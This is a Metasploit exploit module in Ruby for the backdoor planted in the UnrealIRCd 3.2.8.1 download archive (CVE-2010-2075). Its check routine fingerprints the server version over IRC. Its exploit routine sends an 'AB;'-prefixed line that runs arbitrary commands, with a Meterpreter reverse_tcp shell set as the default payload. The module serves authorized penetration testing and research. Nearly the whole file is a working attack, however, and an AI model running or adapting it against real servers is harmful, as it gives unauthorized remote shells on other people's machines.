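##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::Tcp
  prepend Msf::Exploit::Remote::AutoCheck

  # Only the 3.2.8.1 tarball was trojaned, so the fingerprint is pinned to
  # that exact version string rather than to "Unreal" in general.
  BACKDOORED_VERSION = /unreal3\.2\.8\.1/i

  # IRC commands whose replies usually carry the server version string; they
  # are tried in order until one of them reveals the backdoored release.
  VERSION_COMMANDS = %w[VERSION INFO CREDITS MOTD BOTMOTD HELP LICENSE].freeze

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'UnrealIRCD 3.2.8.1 Backdoor Command Execution',
        'Description' => %q{
          This module exploits a malicious backdoor that was added to the Unreal IRCD
          3.2.8.1 download archive. This backdoor was present in the
          Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
        },
        'Author' => [
          'hdm',
          'g0tmi1k' # @g0tmi1k // https://blog.g0tmi1k.com/ - additional features
        ],
        'License' => MSF_LICENSE,
        'References' => [
          [ 'CVE', '2010-2075' ],
          [ 'OSVDB', '65445' ],
          [ 'URL', 'http://www.unrealircd.com/txt/unrealsecadvisory.20100612.txt' ]
        ],
        'Platform' => [ 'unix', 'linux' ],
        'Arch' => ARCH_CMD,
        'Privileged' => false,
        'Payload' => {
          'Space' => 1024,
          'DisableNops' => true
        },
        'Targets' => [
          [
            'Linux/Unix Command',
            {
              'Type' => :unix_cmd,
              'DefaultOptions' => { 'PAYLOAD' => 'cmd/linux/http/x86/meterpreter/reverse_tcp' }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DisclosureDate' => '2010-06-12',
        'DefaultOptions' => { 'wfsDelay' => 30 },
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options([ Opt::RPORT(6667) ])
  end

  # Returns true when +response+ contains the backdoored version string.
  # As a side effect the IRC service is recorded in the database on a match.
  # A nil response (socket timeout) is treated as "not detected".
  def unreal_version?(response)
    return false unless response.to_s.match?(BACKDOORED_VERSION)

    report_service(
      host: rhost,
      port: rport,
      proto: 'tcp',
      name: 'irc',
      info: 'Unreal 3.2.8.1'
    )
    true
  end

  # Writes +cmd+ to the server when it is non-empty, then returns whatever the
  # server sends back within 10 seconds ("" on timeout). Every received line
  # is echoed in verbose mode so a failed fingerprint can be diagnosed.
  def send_irc_command(cmd = '')
    cmd = cmd.to_s
    unless cmd.empty?
      vprint_status(cmd)
      sock.put("#{cmd}\n")
    end

    response = sock.get_once(-1, 10).to_s
    response.each_line { |line| vprint_line(" #{line.chomp}") }
    response
  end

  # Fingerprints the service from its banner, its registration replies and a
  # set of informational commands. The socket opened here is always closed,
  # even on an early return, so a following exploit() starts from a clean state.
  #
  # NOTE(review): a server that hides its version in all of these replies is
  # reported Safe rather than Unknown; use ForceExploit when the version is
  # known by other means.
  def check
    vprint_status('Connecting to IRC service')
    connect
    print_status("Connected to #{Rex::Socket.to_authority(rhost, rport)}")

    vprint_status('Checking IRC banner')
    if unreal_version?(send_irc_command)
      return Exploit::CheckCode::Appears('UnrealIRCd detected in banner')
    end

    irc_user = Faker::Internet.username(specifier: 3..9)
    print_status("Trying to register a new IRC user: #{irc_user}")
    send_irc_command("NICK #{irc_user}")
    # Registration is attempted without answering any PING/PONG challenge.
    response = send_irc_command("USER #{irc_user} 0 * #{irc_user}")
    if unreal_version?(response)
      return Exploit::CheckCode::Appears('UnrealIRCd detected after registration')
    end

    if VERSION_COMMANDS.any? { |irc_cmd| unreal_version?(send_irc_command(irc_cmd)) }
      return Exploit::CheckCode::Appears('UnrealIRCd detected via IRC commands')
    end

    Exploit::CheckCode::Safe('UnrealIRCd 3.2.8.1 not detected')
  rescue ::Rex::ConnectionError => e
    # An unreachable target is an unknown state, not a clean bill of health.
    Exploit::CheckCode::Unknown("Could not connect to the IRC service: #{e.message}")
  ensure
    disconnect
  end

  # Triggers the backdoor: the literal "AB;" prefix followed by the command,
  # sent as a single IRC line. The payload must therefore be a one-liner — an
  # embedded line break would terminate the trigger line early and silently
  # run only the first fragment of the command.
  def exploit
    cmd = payload.encoded
    if cmd.match?(/[\r\n]/)
      fail_with(Failure::BadConfig, 'Payload contains a line break and cannot be sent as a single IRC line')
    end

    vprint_status('Connecting to IRC service')
    connect
    print_status("Connected to #{Rex::Socket.to_authority(rhost, rport)}")

    print_status('Sending IRC backdoor command')
    sock.put("AB;#{cmd}\n")
  ensure
    # Finished with IRC; disconnect() tolerates a nil socket if connect failed.
    disconnect
  end
end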